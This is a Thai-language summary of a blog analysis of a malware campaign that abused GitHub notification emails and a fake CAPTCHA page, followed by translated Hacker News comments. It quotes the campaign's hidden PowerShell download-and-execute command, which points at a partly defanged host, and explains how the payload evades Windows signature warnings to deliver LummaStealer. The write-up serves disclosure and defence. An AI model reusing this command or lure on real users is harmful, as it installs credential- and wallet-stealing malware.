เหตุการณ์แจกจ่ายมัลแวร์โดยอาศัยอีเมลแจ้งเตือนของ GitHub

 (ianspence.com)
1 คะแนน โดย GN⁺ 2024-09-20 | 1 ความคิดเห็น | แชร์ทาง WhatsApp
  • ในฐานะนักพัฒนาโอเพนซอร์ส มักได้รับอีเมลจาก GitHub อยู่บ่อยครั้ง
  • อีเมลส่วนใหญ่เป็นอีเมลแจ้งเตือนเกี่ยวกับกิจกรรมที่ผู้ใช้ GitHub โต้ตอบไว้
  • แต่อีเมลบางฉบับปลอมเป็นการแจ้งเตือนด้านความปลอดภัยของ GitHub เพื่อหลอกให้ดาวน์โหลดมัลแวร์

วิธีการโจมตี

  1. ผู้โจมตีใช้บัญชี GitHub ชั่วคราวสร้าง issue ในรีโพสาธารณะ
  2. ผู้โจมตีลบ issue อย่างรวดเร็ว
  3. เจ้าของรีโพได้รับอีเมลแจ้งเตือน
  4. คลิกลิงก์ในอีเมล
  5. ทำตามคำสั่งแล้วทำให้ระบบติดมัลแวร์

การวิเคราะห์ข้อความอีเมล

  • เนื้อหาอีเมลส่วนใหญ่ถูกควบคุมได้โดยผู้โจมตี
  • ในอีเมลไม่มีข้อมูลว่ามีการสร้าง issue ใหม่
  • ผู้โจมตีแอบอ้างเป็น "Github Security Team"
  • เนื่องจากอีเมลถูกส่งมาจาก GitHub จริง จึงผ่านการตรวจจับฟิชชิง

จุดที่ GitHub ควรปรับปรุง

  • สามารถลดประสิทธิภาพของการโจมตีได้ด้วยการเพิ่มบริบทในอีเมลให้มากขึ้น
  • ควรลดเนื้อหาที่ผู้โจมตีควบคุมได้ และทำให้ตัวผู้ส่งชัดเจนยิ่งขึ้น

เว็บไซต์

  • เมื่อตามลิงก์ในอีเมล จะถูกพาไปยังหน้าจอ CAPTCHA
  • หน้า CAPTCHA ชักจูงให้ผู้ใช้ป้อนคำสั่งในกล่อง Run ของ Windows

มัลแวร์

  • เว็บไซต์จะคัดลอกคำสั่งต่อไปนี้ลงคลิปบอร์ด: 
    powershell.exe -w hidden -Command "iex (iwr '[https://]2x[.]si/DR1.txt').Content"
  • คำสั่งนี้จะเริ่มโปรเซส PowerShell แล้วดาวน์โหลดและรันสคริปต์

ขั้นตอนของมัลแวร์

  1. ดาวน์โหลดและรันสคริปต์ผ่านคำสั่ง PowerShell
  2. สคริปต์จะดาวน์โหลดและรันไฟล์ executable อันตราย
  3. ไฟล์ executable มีลายเซ็นดิจิทัล แต่ไม่ถูกต้อง
  4. Windows ไม่แสดงคำเตือนสำหรับลายเซ็นที่ไม่ถูกต้อง

จุดอ่อนของ Windows

  • ไม่มีการตั้งค่าแฟล็ก "Mark of the Web" (MOTW) สำหรับระบุไฟล์ที่ดาวน์โหลดมาจากอินเทอร์เน็ต
  • คลาส System.Net.WebClient ของ .NET Framework ไม่ได้ตั้งค่าแฟล็ก MOTW
  • เมื่อไม่มีการตั้งค่าแฟล็ก MOTW, Windows จะไม่เตือนเกี่ยวกับลายเซ็นที่ไม่ถูกต้อง

การวิเคราะห์มัลแวร์

  • มัลแวร์ถูกโหลดเข้าไปในหน่วยความจำและรันจากที่นั่น
  • เป็นมัลแวร์ชื่อ LummaStealer ที่ขโมยกระเป๋าคริปโต ข้อมูลรับรองที่บันทึกไว้ และอื่น ๆ

บทสรุป

  • เป็นกรณีการโจมตีที่อาศัยจุดอ่อนของอีเมลแจ้งเตือน GitHub
  • มีการวิเคราะห์โดยใช้เครื่องมือหลากหลายชนิด

สรุปโดย GN⁺

  • บทความนี้กล่าวถึงกรณีโจมตีด้วยมัลแวร์ที่อาศัยอีเมลแจ้งเตือนของ GitHub
  • มีการแจกจ่ายมัลแวร์โดยอาศัยจุดอ่อนในระบบอีเมลของ GitHub
  • ใช้ประโยชน์จากจุดอ่อนของแฟล็ก "Mark of the Web" และการตรวจสอบลายเซ็นดิจิทัลของ Windows
  • มีการใช้มัลแวร์ชื่อ LummaStealer
  • จุดอ่อนเหล่านี้ถูกรายงานไปยัง GitHub และ Microsoft แล้ว
  • สำหรับโครงการอื่นที่มีฟังก์ชันคล้ายกัน ผู้เขียนแนะนำเอกสารวิเคราะห์ของ Cyfirma

บทความที่เกี่ยวข้อง

1 ความคิดเห็น

 
GN⁺ 2024-09-20
ความคิดเห็นจาก Hacker News

  • ไม่นานมานี้ได้รับอีเมลที่น่าเชื่อถือมากจาก PayPal

    • มีคนใช้ฟังก์ชันอ้างอิงเพื่อตั้งชื่อบริษัทเป็น "PayPal need to get in touch about a your recent payment of $499.00, please call +1-...."
    • อีเมลดังกล่าวมาจาก PayPal.com จริง ๆ และไม่เข้าใจว่าทำไมถึงไม่จัดการชื่อผู้ใช้ลักษณะนี้
    • ได้รายงานเรื่องนี้ไปแล้ว แต่ยังไม่ได้รับคำตอบ
    • อีเมลนี้ถูกจัดรูปแบบให้ดูเหมือนอีเมลจริงจาก PayPal มาก จนคิดว่าคนจำนวนมากน่าจะโดนหลอก

  • สงสัยจริง ๆ ว่าผู้คนตกหลุมกลโกงแบบนี้กันหรือไม่

    • สมมติว่ารู้ว่าอีเมลมาจาก github
    • สัญญาณเตือนข้อแรก: อีเมลลิงก์ไปยังโดเมนดัดแปลงจากโดเมนจริง
    • สัญญาณเตือนข้อที่สอง: แคปชาขอให้พิมพ์คำสั่งเชลล์

  • คิดว่านักพัฒนาระดับจูเนียร์อาจตกเป็นเหยื่อของกลโกงแบบนี้ได้

    • "โอ้ แก้แคปชาด้วยการรันโค้ด แปลกดีแฮะ!"

  • หน้าเว็บไม่ควรสามารถกรอกบัฟเฟอร์คัดลอก/วางได้ด้วยการคลิกเพียงครั้งเดียว

    • ไม่ควรกดลิงก์ในอีเมลหรือเชื่อถือเนื้อหาในอีเมล
    • ปัญหาคือ Windows ยังยอมให้ยกระดับสิทธิ์เป็น root ได้ด้วยคำสั่ง PowerShell เพียงบรรทัดเดียว

  • Github ควรป้องกันไม่ให้บริการอัตโนมัติใส่ลิงก์ลงใน issue โดยไม่ตรวจสอบลิงก์

    • Github ควรควบคุมเนื้อหาที่ส่งทางอีเมลให้ดีกว่านี้

  • สงสัยว่า github-scanner.com ยังเป็นฝั่งไม่หวังดีอยู่หรือไม่

    • Cloudflare เป็นผู้โฮสต์ DNS และไม่มีวิธีรายงานปัญหานี้

  • ผู้โจมตีลบ issue อย่างรวดเร็ว

    • มีเพียงผู้ดูแลระบบเท่านั้นที่ลบ issue ได้
    • ดังนั้นใน repository จึงยังมีร่องรอยของ issue หลงเหลืออยู่

  • เป็นบทความที่ดี ให้ความรู้สึกคล้ายบล็อกของ Julia Evans

  • น่าเศร้าที่แม้ในปี 2024 ก็ยังมีคนถูกหลอกด้วยกลวิธีง่าย ๆ ที่สุดอยู่

  • เช้านี้ได้รับการแจ้งเตือนแบบนี้และก็เพิกเฉยไป

    • การแจ้งเตือนเกี่ยวข้องกับ repository หนึ่ง

  • คุ้มค่าแก่การอ่าน เพราะแสดงให้เห็นว่าพวกเขาพยายามจะทำอะไร

    • แค่ลิงก์อย่างเดียวก็น่าสงสัยได้แล้ว แต่ก็น่าสนุกที่ได้เห็นใครสักคนขุดเรื่องนี้ลงลึก

  • ได้รับอีเมลแจ้งเตือนจาก GitHub ที่คล้ายกัน

    • บอกว่าพบช่องโหว่ใน repository แต่ไม่ได้คลิก
    • ไม่ได้คลิกเพราะเป็นโปรแกรมเมอร์ขี้เกียจ